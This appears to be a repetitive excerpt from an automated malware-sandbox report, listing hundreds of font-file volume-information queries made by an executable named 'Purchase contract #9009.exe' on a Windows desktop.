          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
